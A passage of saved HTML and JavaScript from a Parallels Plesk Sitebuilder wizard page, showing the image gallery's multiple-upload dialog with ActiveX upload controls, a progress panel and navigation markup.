<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('SbApplyChanges');
       </script><script type="text/javascript" language="javascript" src="/js/apply_changes.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript"></script><script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="StatusDetailedBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="StatusDetailed" style="width: 750px; height: 370px; display: none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="StatusDetailedHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="StatusDetailedTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Detailed status messages</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sb_status.hideDetails();return false;"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"></td></tr>
<tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top"><div>
<div style="margin-bottom: 7px;"><table cellspacing="1" border="0" style="width: 720px;" align="center"><tr>
<td><table cellspacing="0" cellpadding="0" border="0" style="border-collapse: collapse;"><tr>
<td valign="middle" class="sb-text" style="padding-right: 5px;">View</td>
<td valign="middle" style="padding-right: 5px;"><select class="sb-text" onchange="sb_status.filterDetails(this.value)"><option value="0">All messages</option>
<option value="1">Information</option>
<option value="2">Errors</option>
<option value="3">Warnings</option></select></td>
</tr></table></td>
<td align="right"><table align="right" onclick="sb_status.clearDetails(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Clear</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr></table></div>
<div style="height: 180px; border-style: solid; border-width: 0px; width: 100%; overflow-y: auto; overflow-x: auto; overflow: auto; float: left;"><table cellspacing="1" border="0" style="width: 100%;" align="center" id="StatusDetailedMessages">
<tr class="sb-gridview-header" align="left" style="height: 24px; white-space: nowrap;">
<th style="padding-left: 4px; padding-right: 4px; text-align: left; width: 15px;" scope="col">#</th>
<th style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" scope="col">S</th>
<th style="padding-left: 4px; padding-right: 4px;" scope="col">Message</th>
</tr>
<tr class="0" style="display: none;">
<td style="padding-left: 4px; padding-right: 4px; text-align: left; width: 15px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px;" class="sb-gridtext">..</td>
</tr>
<tr class="1" style="display: none;">
<td style="padding-left: 4px; padding-right: 4px; text-align: left; font-wight: bold; width: 15px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px;" class="sb-gridtext">..</td>
</tr>
</table></div>
<div style="padding-top: 7px; width: 100%;"><table align="right" onclick="sb_status.hideDetails();return false; return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Close</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></div>
</div></td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('StatusDetailed');
       </script><script type="text/javascript" language="javascript" src="/js/wizard.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript" src="/js/navigation.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript">
           var baseUrl='';
           var sbNavigationObject;
           sbNavigationObject = new SB_Navigation('SB_WizardForm', '/Wizard/Edit/Modules/ImageGallery');
           </script><form name="SB_WizardForm" method="post" enctype="multipart/form-data" onsubmit="return wizardFormSubmit();" action="/Wizard/Edit/Modules/ImageGallery">
<script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="MultipleUploadDialogIdBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="MultipleUploadDialogId" style="width: 960px;height: 650px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="MultipleUploadDialogIdHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="MultipleUploadDialogIdTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Multiple Image Upload</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sbNavigationObject.go();"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"></td></tr>
<tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top">
<script type="text/javascript" src="/modules/ImageGallery/js/activeXUpload.js?5.0.0.2009110318"></script><table style="width:100%;height:80%"><tr><td>
<object classid="clsid:5220CB21-C88D-11cf-B347-00AA00A28331" codebase="/applet/SWHTTPUploaderProj.cab"></object><object classid="clsid:A8B02DCA-7648-46D6-95A8-B84EC80CA49D" name="JamShellLinkX" id="JamShellLinkX" align="left" codebase="/applet/SWHTTPUploaderProj.cab"></object><object classid="clsid:7306A0C7-E97C-46CD-BBAD-0DD72CFD32CB" id="FileUploader" name="FileUploader" style="display: none;" codebase="/applet/SWHTTPUploaderProj.cab"></object><table width="100%"><tr class="sb-edit-panel-block">
<td class="sb-edit-panel-block-border" style="width:25%;height:100%;vertical-align:top;"><object classid="clsid:FEF7EDB0-837D-429B-8FD0-EF890F70C5B3" name="JamShellTreeX" id="JamShellTreeX" align="left" width="100%" height="500px" codebase="/applet/SWHTTPUploaderProj.cab"></object></td>
<td class="sb-edit-panel-block-border" style="width:75%;"><table class="sb-table-design" cellspacing="0" cellpadding="5" border="0" height="100%" style="border-width:0px;width:100%;border-collapse:collapse;">
<tr><td><object classid="clsid:5999A3EE-E436-434A-A277-5A8A83CF3E98" name="JamShellComboX" id="JamShellComboX" align="left" width="100%" height="24px" codebase="/applet/SWHTTPUploaderProj.cab"></object></td></tr>
<tr><td><table class="sb-table-design" cellspacing="0" cellpadding="0" border="0" style="border-width:0px;height:100%;width:100%;border-collapse:collapse;"><tr>
<td style="width:30%;white-space:nowrap;text-align:left;"><table><tr>
<td><table cellpadding="0" cellspacing="0" border="0" style="
                       cursor: pointer;" class="" id="ButtonSelectAllId" onclick="
                                                                   JamShellListX.SelectAll();
                                                                   SetSelectedCount();
                                                                   return false;
                                                                   "><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td class="" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="ButtonSelectAllIdMainText">Select All</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" style="
                       cursor: pointer;" class="" id="ButtonUnSelectId" onclick="
                                                                       JamShellListX.ClearSelection();
                                                                       SetSelectedCount();
                                                                       return false;
                                                                   "><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td class="" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="ButtonUnSelectIdMainText">Deselect All</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table></td>
</tr></table></td>
<td style="text-align:center;">
<span class="sb-label">Selected:..</span><span id="selectedImagesCountId" class="sb-text" style="font-weight:bold;"></span><span class="sb-text" style="font-weight:bold;">..image(s)</span>
</td>
<td style="width:30%;white-space:nowrap;text-align:right;"><span class="sb-text">Click images to select or deselect them.<br>Double-click images for full-sized preview.</span></td>
</tr></table></td></tr>
<tr style="height:420px;"><td><object classid="clsid:9CDE10DA-6917-4FEA-9E89-9FBB451D8BC8" name="JamShellListX" id="JamShellListX" align="left" width="100%" height="100%" codebase="/applet/SWHTTPUploaderProj.cab"></object></td></tr>
<tr><td style="white-space:nowrap;"><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr>
<td nowrap style="text-align: left; width: 1%">
<span class="sb-text" style="font-weight:bold;">Upload to category:..</span><select name="categoryDropdown" id="CategoryListId" class="sb-text" onchange="document.getElementById('NewCategoryId').style.display = (this.value == 'new') ? 'inline' : 'none'"><option value="1">Category1</option>
<option value="2">Category2</option>
<option value="new" selected>Create new category</option>
<option value="0">No category</option></select>
</td>
<td><input type="text" id="NewCategoryId" class="sb-control-input-input" style="width:100px"></td>
<td align="right">
<span class="sb-text" style="font-weight:bold">Resize images..</span><select id="ResizeResolutionId"><option value="1024|768">1024x768</option>
<option value="800|600">800x600</option>
<option value="640|480">640x480</option>
<option value="10000|10000">Do not resize</option></select>
</td>
</tr></table></td></tr>
</table></td>
</tr></table>
</td></tr></table>
<script for="JamShellListX" event="OnClick(e)" language="javascript">
SetSelectedCount();
</script><script type="text/javascript">
function initializeView() {
   ControlsInit();
   SetSelectedCount();
}

function StartImageUploading() {
   if(IsCategory()) {
       StartUpload();
   }
   else {
       alert(Localization['EmptyCategory']);
       return false;
   }
}

Localization['Progress'] = SbGetLocaleByKey('PROGRESS');
Localization['Alert'] = SbGetLocaleByKey('ALERT');
Localization['FileNoFound'] = SbGetLocaleByKey('FILE-NOT-FOUND');
Localization['NotResize'] = SbGetLocaleByKey('CANNOT-RESIZE-FILE');
Localization['HttpError'] = SbGetLocaleByKey('HTTP-ERROR');
Localization['CanNotUpload'] = SbGetLocaleByKey('FURIOUS-ERROR-MESSAGE');
Localization['EmptyCategory'] = SbGetLocaleByKey('EMPTY-CATEGORY-MESSAGE');

var BaseUrl = unescape('http%3A%2F%2Fvulnerarable.plesk.smb.10.2.0.site%3A2006%2FWizard%2FEdit%2FModules%2FImageGallery%2FImage%2FExternalUpload%3FSessionID%3D42b54cb11fc3aedbd%26currentPageId%3D1iqsyi3rp1o');
var PostBackScript = 'sbNavigationObject.go(baseUrl + "/Wizard/Edit/Modules/ImageGallery")';

var JamShellComboX = document.getElementById('JamShellComboX');
var JamShellTreeX = document.getElementById('JamShellTreeX');
var JamShellListX = document.getElementById('JamShellListX');
var JamShellLinkX = document.getElementById('JamShellLinkX');
var FileUploader = document.getElementById('FileUploader');
var JamSelectImages = document.getElementById('selectedImagesCountId');

var ButtonUploadId = 'ButtonUploadId';
var ButtonCancelId = 'ButtonCancelId';
var MultipleUploadDialogId = 'MultipleUploadDialogId';
var StatusUploadDialogId = 'StatusUploadDialogId';
var ResizeResolutionId = 'ResizeResolutionId';
var NewCategoryId = 'NewCategoryId';
var CategoryListId = 'CategoryListId';
var ButtonSelectAllId = 'ButtonSelectAllId';
var ButtonUnSelectId = 'ButtonUnSelectId';
var ProgressBarId = 'sbProgressBar';
var UploadetFileCountId = 'UploadetFileCountId';
var FromFileCountId = 'FromFileCountId';
var FileLeftCountId = 'FileLeftCountId';
var FileNameId = 'FileNameId';
var ErrorImageId = 'ErrorImageId';
var ProgressImageId = 'ProgressImageId';
var PanelErrorsId = 'PanelErrorsId';
var PanelPBId = 'PanelPBId';
var PanelFileNameId = 'PanelFileNameId';
var ErrorLabelId = 'ErrorLabelId';
var PanelProgressButtonsId = 'PanelProgressButtonsId';
var PanelErrorButonsId = 'PanelErrorButonsId';
RegisterOnloadAction("initializeView()");
</script><table><tr>
<td style="width:99%"><a href="#" onclick="javascript:sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery/ImageUpload')">If you do not see the Multiple Image Upload window, click here.</a></td>
<td><table align="center" onclick="StartImageUploading(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0" id="ButtonUploadId"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Upload</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
<td><table align="center" onclick="sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery'); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0" id="ButtonCancelId"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Cancel</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr></table>
</td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('MultipleUploadDialogId');
       </script><script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="StatusUploadDialogIdBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="StatusUploadDialogId" style="width:440px; height:250px; display:none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="StatusUploadDialogIdHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="StatusUploadDialogIdTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Progress</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery');"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"></td></tr>
<tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top">
<table style="width:100%;height:80%"><tr>
<td style="width:70px; vertical-align:top">
<img id="ProgressImageId" src="/skins/WinXPReloadedCompact/icons/AddImage.png" alt="upload"><img id="ErrorImageId" src="/skins/WinXPReloadedCompact/icons/errorIcon.gif" alt="error" style="display:none">
</td>
<td style="vertical-align:top;align:left;width:99%;height:100%">
<table>
<tr><td class="sb-text" style="vertical-align:top">Images uploaded:..<span id="UploadetFileCountId">0</span>
                                   ..of..
                                   <span id="FromFileCountId">0</span>
</td></tr>
<tr id="PanelPBId"><td>
<script type="text/javascript" language="javascript" src="/js/progress_bar.js?5.0.0.2009110318"></script><div id="sbProgressBar" style="background-color: #F7F7F7;border: 1px solid #CCCCCC;margin: 8px;padding: 8px;text-align: left;display:block; width:300px; text-align:left; height:10px;"><div>
<table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right" style="white-space: nowrap;">
<span id="sbProgressBarStatus">0</span>% </td></tr></table>
<div style="width:0px; height:8px;"><span></span></div>
<div class="sb-publish-progress-block"><img id="sbProgressBarImage" src="/skins/WinXPReloadedCompact/images/publish_progress.gif" alt="" height="20" style="width:0%; border-width:0px;"></div>
</div></div>
<script type="text/javascript" language="javascript">
           var sbProgressBar = new SbProgressBar();
       </script>
</td></tr>
<tr><td class="sb-text">Images left: <span id="FileLeftCountId">0</span>
</td></tr>
<tr><td class="sb-text" id="PanelFileNameId"><span>Uploading:..<span id="FileNameId"></span></span></td></tr>
</table>
<div id="PanelErrorsId"><table><tr><td><span id="ErrorLabelId" class="sb-label-error"></span></td></tr></table></div>
</td>
</tr></table>
<div id="PanelProgressButtonsId"><table width="100%"><tr>
<td width="99%">..</td>
<td><table onclick="CancelUploadFiles();" style="cursor: pointer; width: 90px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td style="width: 1px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td style="background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); background-repeat:repeat-x; width: 1px; padding-left: 5px;"><img src="/skins/WinXPReloadedCompact/icons/cancel.gif"></td>
<td style="background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif);" align="center" class="sb-button-cancel">Cancel</td>
<td style="width: 1px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr></table></div>
<div id="PanelErrorButonsId"><table width="100%"><tr>
<td width="99%">..</td>
<td><table align="center" onclick="RetryUpload(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0" id="retryButtonId"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Retry</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
<td><table align="center" onclick="sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery'); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">OK</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr></table></div>
</td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('StatusUploadDialogId');
       </script><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%">
<tr id="TRHeader"><td COLSPAN="2">
<table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-header-top-container"><tr><td><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%;" class="sb-header-top"><tr>
<td width="100%"><div style="width: 205px; text-align: center;"><img align="middle" style="cursor: pointer;" alt="" border="0" src="/skins/WinXPReloadedCompact/images/def_sb_logo.gif?5.0.0.2009110318" onclick="window.open('http://www.parallels.com', '_new'); return false;"></div></td>
<td><table cellspacing="0" cellpadding="0" border="0" style="border-width:0px;border-collapse:collapse;"><tr>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Start');" style="cursor: pointer;"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_left.gif"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_start_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Start</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Design');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_design_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Design</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Pages');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_pages_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Pages</td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_al.gif"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_abg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_edit_abullet.gif"></td>
<td class="sb-steps-text-active" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_abg.gif);">Edit</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_ar.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Publish');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_publish_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Publish</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_right.gif"></td>
</tr></table></td>
</tr></table></td>
<td align="right" class="sb-header-company-logo"><img style="cursor: pointer" onclick="window.open('http://www.parallels.com', '_new'); return false;" border="0" src="/skins/WinXPReloadedCompact/images/def_parallels_logo_wizard.gif"></td>
</tr></table></td></tr></table>
<table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-header-bottom"><tr>
<td style="padding-left: 10px;">
<table cellpadding="0" cellspacing="0" border="0" style="
                       filter:alpha(opacity=40); opacity: 0.4;
                       " class="" id="saveChangesButton" onclick=""><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/button_middle.gif);padding-left:5px;padding-right:5px;" class=""><img src="/skins/WinXPReloadedCompact/icons/save_icon.gif"></td>
<td class="" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="saveChangesButtonMainText">Save Changes</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table>
<script type="text/javascript">
                           sbApplyChangesObject.addListener(enableSaveChangesButton);
                       </script>
</td>
<td style="padding-left: 10px; width: 100%;" onclick="sb_status.showDetails();" id="StatusBar">
<table cellpadding="0" cellspacing="3" width="100%" border="0" style="display:inline-block;width:100%;"><tr>
<td valign="middle"><img id="StatusIcon" style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/icon_help.gif"></td>
<td valign="middle" width="100%" style="padding-left: 10px;"><div id="StatusMessage" class="sb-statusbar-text">Create and edit the content of your web site.</div></td>
</tr></table>
<script type="text/javascript" language="javascript" src="/js/Wizard/Status.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript">
                       sb_status = new SB_Status('/skins/WinXPReloadedCompact');
                       </script>
</td>
<td class="sb-header-bottom-right"><table cellspacing="0" cellpadding="0" border="0" style="height: 100%;"><tr><td><a style="text-decoration: none" onclick="javascript:try{window.open('http://download1.parallels.com/PPSMBE/10.0.0/Doc/help.htm?locale=en-US&article=/Wizard/Edit/Modules/ImageGallery/MultiImagesUpload&help_type=user','_blank')}catch(e){}; void(0);" href="#"><table cellpadding="0" cellspacing="0" border="0" type="button" style="height:100%;"><tr>
<td style="padding: 5px;"><img style="border-width:0px;" width="16" height="16" src="/skins/WinXPReloadedCompact/icons/help.png"></td>
<td class="sb-tools-text" style="padding-right:10px;">Help</td>
</tr></table></a></td></tr></table></td>
</tr></table>
</td></tr>
<tr><td class="sb-wizard-layout-content">
<script type="text/javascript" src="/js/Wizard/panel_toogle.js?5.0.0.2009110318"></script><table border="0" cellpadding="0" cellspacing="0" style="height: 100%;width:100%" align="center"><tr><td style="vertical-align: top; " align="center"><table cellpadding="0" cellspacing="0" border="0" style="height: 100%;width:100%"><tr>
<td valign="top">
<input type="hidden" id="LeftPanelDiv_hidden" value="false"><input type="hidden" id="LeftPanelDiv_show_action" value="localeCode=en_US&section=Wizard_Edit&key=showSiteMap"><input type="hidden" id="LeftPanelDiv_hide_action" value="localeCode=en_US&section=Wizard_Edit&key=hideSiteMap"><table style="height:100%;" cellpadding="0" cellspacing="0" border="0" class="sb-edit-panel"><tr>
<td><div id="LeftPanelDiv" style="height: 100%; display: block;"><table width="200" cellspacing="8" cellpadding="8" border="0">
<tr valign="top" height="1"><td><b class="sb-text">Site map</b></td></tr>
<tr class="sb-edit-panel-block"><td class="sb-edit-panel-block-border" id="siteMapTd" valign="top" height="1">
<script src="/js/Wizard/Edit.js?5.0.0.2009110318" language="javascript"></script><script type="text/javascript" language="javascript"></script><table border="0" cellpadding="0" cellspacing="0" width="100%" height="100%" style="table-layout: fixed;"><tr><td valign="top">
<script type="text/javascript" language="javascript" src="/js/pages_tree.js?5.0.0.2009110318"></script><div id="edit" style="white-space: nowrap; overflow-x: hidden; overflow-y: auto; width:100%; height:100%;">
<script type="text/javascript" language="javascript"></script><div id="q485ez4jvyq" valign="middle">
<img id="q485ez4jvyqState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="q485ez4jvyqLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="q485ez4jvyqCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="q485ez4jvyqIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="q485ez4jvyqSpan" style="vertical-align: middle;">Home</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'q485ez4jvyq', 'page1.php', 'Simple', '', '', 'visible');
       </script><div id="hwal3pvmvz3" valign="middle">
<img id="hwal3pvmvz3State" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="hwal3pvmvz3Line" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="hwal3pvmvz3Check" type="checkbox" style="display: inline; vertical-align: middle;"><img id="hwal3pvmvz3Icon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="hwal3pvmvz3Span" style="vertical-align: middle;">About Me</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'hwal3pvmvz3', 'page2.php', 'Simple', '', '', 'visible');
       </script><div id="b1ynn2c224e" valign="middle">
